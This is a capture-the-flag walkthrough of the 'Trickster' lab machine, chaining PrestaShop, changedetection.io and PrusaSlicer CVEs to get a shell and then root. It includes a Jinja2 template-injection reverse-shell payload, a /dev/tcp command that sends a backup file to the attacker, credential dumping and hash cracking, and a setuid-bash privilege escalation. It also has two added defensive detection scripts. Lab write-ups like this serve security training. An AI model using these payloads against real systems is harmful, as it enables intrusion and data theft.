Explore the fundamentals of cybersecurity in the Trickster Capture The Flag (CTF) challenge, a medium-level experience, ideal for those seeking to advance their skills! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it a great stepping stone for those familiar with basic security techniques looking to tackle more complex scenarios.

Add Hosts

Edit the /etc/hosts file and add the following entries:

10.10.11.34 trickster.htb shop.trickster.htb

Script to add hosts automatically

ip="10.10.11.34";domain="trickster.htb shop.trickster.htb"
sudo grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV trickster.htb

Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-21 21:16 CEST
Nmap scan report for trickster.htb (10.10.11.34)
Host is up (0.059s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 8c:01:0e:7b:b4:da:b7:2f:bb:2f:d3:a3:8c:a6:6d:87 (ECDSA)
|_  256 90:c6:f3:d8:3f:96:99:94:69:fe:d3:72:cb:fe:6c:c5 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: 403 Forbidden
Service Info: Host: _; OS: Linux; CPE: cpe:/o:linux:linux_kernel

CVE-2024-34716 (PrestaShop)

git clone https://github.com/aelmokhtar/CVE-2024-34716
cd CVE-2024-34716
vpnip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
python3 exploit.py --url 'http://shop.trickster.htb' --email 'adam@trickster.htb' --local-ip $vpnip --admin-path 'admin634ewutrx1gitlooaj'

Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Press Ctrl+Z to background the shell, then run:

stty size; stty raw -echo; fg

As the last step, set the terminal environment:

export TERM=xterm

Find Database Credentials

timeout 1 find /var/www -type f -name "*.php" -exec grep -Hn 'database_' {} \; 2>/dev/null

Use the found credentials to access the MySQL database:

mysql -h 127.0.0.1 -u <user> -p

Inside MySQL:

USE prestashop;
SELECT id_employee, email, passwd FROM ps_employee;

Brute Force the Hash

Use a hash cracking tool like hashcat or John the Ripper to perform a brute force attack on the password hash, or use a service such as crackstation for this purpose.

echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat -m 3200 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat -m 3200 /tmp/hash.txt --show
rm -rf /tmp/hash.txt

SSH Access

After cracking the password, use it to SSH:

ssh james@trickster.htb

Ping Sweep for Active Hosts

By checking the network interfaces you may notice the address 172.17.0.1 (the Docker bridge), which points to a container on that network. Perform a ping sweep to identify active hosts:

subnet="172.17"
(
for i in {0..255}; do
  for j in {1..254}; do
    ip="$subnet.$i.$j"
    (ping -c 1 -W 1 $ip >/dev/null 2>&1 && echo "Host $ip is up") &
  done
done
wait
)

You should find 172.17.0.2.

Scan Ports of 172.17.0.2

Scan the ports:

nc -zv 172.17.0.2 1-65535 2>&1 | grep succeeded

If nc isn’t available, use the bash alternative:

(
for port in {1..65535}; do
 (echo > /dev/tcp/172.17.0.2/$port) >/dev/null 2>&1 && echo "Port $port is open" &
done
)

Port 5000 is open.

Forward Port 5000 for Local Access

ssh -L 5000:172.17.0.2:5000 james@trickster.htb

CVE-2024-32651 (changedetection.io)

Log in to changedetection.io (now reachable on localhost:5000 through the SSH tunnel) using James’ credentials.

Host a Python HTTP server:

python -m http.server

Set up a listener for the reverse shell:

nc -lvnp 9001

Replace vpn-ip in the watch URL and in the notification body below with your actual VPN IP so the target can reach your listener.

Create a new “watch” whose URL is http://vpn-ip:8000 (the Python HTTP server started above). In the notification settings:

Notification URL:

gets://

Notification Body:


{% for x in ().__class__.__base__.__subclasses__() %}
  {% if "warning" in x.__name__ %}
    {{ x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"vpn-ip\",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"/bin/bash\")'").read() }}
  {% endif %}
{% endfor %}

To trigger the watch, create a file in the HTTP server:

touch file

Visit the changedetection.io main page and manually retrigger the watch by clicking the recheck option.
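As an added defensive example (not part of the original writeup or of changedetection.io), the check below flags the constructs this payload relies on in a notification body: dunder attribute access used to walk the class hierarchy, and names that turn reachable builtins into command execution. It runs over two constructed sample bodies, a benign one and a shortened variant of the template above.

```python
import re

# Jinja2 expression blocks {{ ... }} and statement blocks {% ... %}.
JINJA_BLOCK = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.DOTALL)
# Dunder attribute access (".__class__", "['__import__']") is how the
# payload walks from a tuple to the class hierarchy and on to builtins.
DUNDER_ACCESS = re.compile(r"\.__[A-Za-z0-9_]+__|\[\s*['\"]__[A-Za-z0-9_]+__['\"]\s*\]")
# Names that turn reachable builtins into command execution.
EXEC_NAMES = re.compile(r"\b(popen|system|__import__|eval|exec|subprocess)\b")

# Constructed samples: a normal notification body and a shortened form of
# the template above (this variant only runs "id").
BENIGN_BODY = "Change detected at {{ watch_url }}\n{{ diff }}"
MALICIOUS_BODY = (
    "{% for x in ().__class__.__base__.__subclasses__() %}"
    "{% if 'warning' in x.__name__ %}"
    "{{ x()._module.__builtins__['__import__']('os').popen('id').read() }}"
    "{% endif %}{% endfor %}"
)


def scan_template(body):
    """Return (block, reason) pairs for suspicious constructs in a notification
    body; an empty list means only ordinary template variables were used."""
    findings = []
    for block in JINJA_BLOCK.findall(body):
        if DUNDER_ACCESS.search(block):
            findings.append((block, "dunder attribute access"))
        if EXEC_NAMES.search(block):
            findings.append((block, "command execution name"))
    return findings


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("malicious", MALICIOUS_BODY)):
        print(label, scan_template(body))
```

The pattern-based check is a detection aid for logged or stored notification templates; the actual fix is rendering user-supplied templates in a sandboxed Jinja2 environment.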

PrivEsc

To retrieve a backup file from the target, set up a listener on your local machine using nc. This will allow you to receive the file when it’s sent from the target.

nc -lvnp 4445 > changedetection-bak.zip

On the target machine, use the following command to send the backup file to your local machine through the open listener.

cat /datastore/Backups/changedetection-backup-20240830194841.zip > /dev/tcp/vpn-ip/4445

After receiving the file, close the listener and extract the contents of the zip file. Use brotli to decompress any .br files you find and then read their contents.

unzip changedetection-bak.zip
brotli -d b4a8b52d-651b-44bc-bbc6-f9e8c6590103/f04f0732f120c0cc84a993ad99decb2c.txt.br
cat ./b4a8b52d-651b-44bc-bbc6-f9e8c6590103/f04f0732f120c0cc84a993ad99decb2c.txt

Within the extracted file, you will find the credentials for the user adam:

adam:adam_admin992

To gain access to the target, log in as adam:

su adam

Next, check the sudo privileges available to the adam user to see what commands can be executed with elevated permissions.

sudo -l

You should see output indicating that adam can run PrusaSlicer with elevated privileges without needing to provide a password:

User adam may run the following commands on trickster:
(ALL) NOPASSWD: /opt/PrusaSlicer/prusaslicer

This means you can exploit the application by running sudo /opt/PrusaSlicer/prusaslicer without needing a password.

CVE-2023-47268 (PrusaSlicer)

https://www.exploit-db.com/exploits/51983

The exploit works through the .3mf project file: copy it over with scp, edit Metadata/Slic3r_PE.config so the post_process setting runs chmod u+s /bin/bash, repack the archive, upload it back to the target, and let PrusaSlicer (running as root via sudo) execute that post-processing command to gain root privileges.

scp adam@trickster.htb:/opt/PrusaSlicer/TRICKSTER.3mf Trickster.3mf
unzip Trickster.3mf Metadata/Slic3r_PE.config -d ./tmp
sed -i 's/^.*post_process.*/; post_process = "chmod u+s \/bin\/bash"/' ./tmp/Metadata/Slic3r_PE.config
sed -i 's/^.*output_filename_format.*/; output_filename_format = exploit.gcode/' ./tmp/Metadata/Slic3r_PE.config
cd ./tmp
zip -r -Z deflate ../Trickster.3mf ./*
cd ..
rm -rf ./tmp
scp Trickster.3mf adam@trickster.htb:/tmp/
rm -f Trickster.3mf

On the target machine, execute PrusaSlicer with the modified file:

sudo /opt/PrusaSlicer/prusaslicer -s /tmp/Trickster.3mf
bash -p
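As an added defensive example (not the box's file and not PrusaSlicer's code), the script below parses Metadata/Slic3r_PE.config inside a .3mf and reports any post_process command the slicer would run; the sample project files are constructed in memory, one clean and one carrying the chmod line above. A check like this belongs in front of any sudo-wrapped slicer invocation.

```python
import io
import re
import zipfile

# Lines in Metadata/Slic3r_PE.config look like "; key = value" (G-code comment
# style), which is why the sed commands above keep the leading "; ".
CONFIG_LINE = re.compile(r"^\s*;\s*([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*?)\s*$")


def parse_slic3r_config(text):
    """Return a {key: value} dict from a Slic3r_PE.config body (quotes stripped)."""
    settings = {}
    for line in text.splitlines():
        m = CONFIG_LINE.match(line)
        if m:
            settings[m.group(1)] = m.group(2).strip('"')
    return settings


def audit_3mf(data):
    """Inspect an in-memory .3mf (a zip archive) and return the post-processing
    commands it would make PrusaSlicer run, as (member name, command) pairs.
    A clean project has post_process = "" so the result is empty."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith("Slic3r_PE.config"):
                continue
            cfg = parse_slic3r_config(zf.read(name).decode("utf-8", "replace"))
            command = cfg.get("post_process", "")
            if command:
                findings.append((name, command))
    return findings


def build_sample_3mf(post_process):
    """Constructed sample (not the box's TRICKSTER.3mf): a minimal .3mf holding
    only the Metadata/Slic3r_PE.config member with the given post_process value."""
    config = "\n".join([
        "; generated by PrusaSlicer (constructed sample)",
        "; layer_height = 0.2",
        '; post_process = "%s"' % post_process,
        "; output_filename_format = {input_filename_base}.gcode",
    ])
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Metadata/Slic3r_PE.config", config)
    return buf.getvalue()
```

Running audit_3mf(build_sample_3mf("chmod u+s /bin/bash")) returns the member name and the command, while the clean sample returns an empty list.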

At this point, you should have elevated privileges and can access sensitive files such as /root/root.txt.

cat /root/root.txt